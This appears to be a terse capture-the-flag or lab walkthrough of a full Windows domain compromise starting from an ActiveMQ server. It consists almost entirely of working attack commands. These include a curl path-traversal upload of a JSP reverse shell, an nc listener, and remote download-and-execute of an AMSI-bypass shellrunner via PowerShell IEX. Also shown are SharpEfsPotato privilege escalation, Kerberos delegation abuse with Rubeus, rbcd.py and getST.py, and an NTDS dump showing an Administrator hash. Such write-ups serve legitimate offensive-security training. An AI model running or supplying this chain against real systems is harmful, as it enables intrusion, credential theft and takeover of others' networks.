[[#|## Active MQ exploit 2016]]
Flag:3 is obtained here
Active MQ is service running on port 8161
Uploading the shell
curl -u 'admin:3f18DV^t!svBV4ntcrLRTWi2XaMCDK' -v -X PUT --data "@jsp-reverse.jsp" http://10.9.20.12:8161/fileserver/..\\admin\\jsp-reverse.jsp
Visiting the page and getting the shell
http://10.9.20.12:8161/admin/jsp-reverse.jsp
nc -lvnp 8080
Stable shell
cd C:\Windows\System32\WindowsPowerShell\v1.0\
powershell.exe
Server the am.txt (amsi bypass) shellrunner SliverPhollow.txt
python -m http.server 80
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX
Privilege Escalation
upload SharpEfsPotato.exe
upload CASUAL_PLATFORM.exe
execute SharpEfsPotato.exe -p CASUAL_PLATFORM.exe
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX
Lateral Movement to M3DC
Sliver with kali
Obtain the tgt of spn we have access to (user with spn has also generic write over the other machine )
rubeus tgtdeleg /service:krbtgt /nowrap
[IO.File]::WriteAllBytes("C:\Windows\tasks\svc_apache.kirbi", [Convert]::FromBase64String(""))
Kali
ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=svc_apache.ccache
rbcd.py -delegate-from svc_apache -delegate-to M3DC$ -action 'write' 'm3c.local/svc_apache' -k -no-pass
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_apache' -k -no-pass
export KRB5CCNAME=Norma.branham.ccache
cme smb 10.9.20.10 -u norma.branham --use-kcache --ntds
Loot
SMB 10.9.20.10 445 M3DC [+] m3c.local\norma.branham from ccache (Pwn3d!)
SMB 10.9.20.10 445 M3DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.9.20.10 445 M3DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:5a0618a9e03bd9fa9efbe142468afed5:::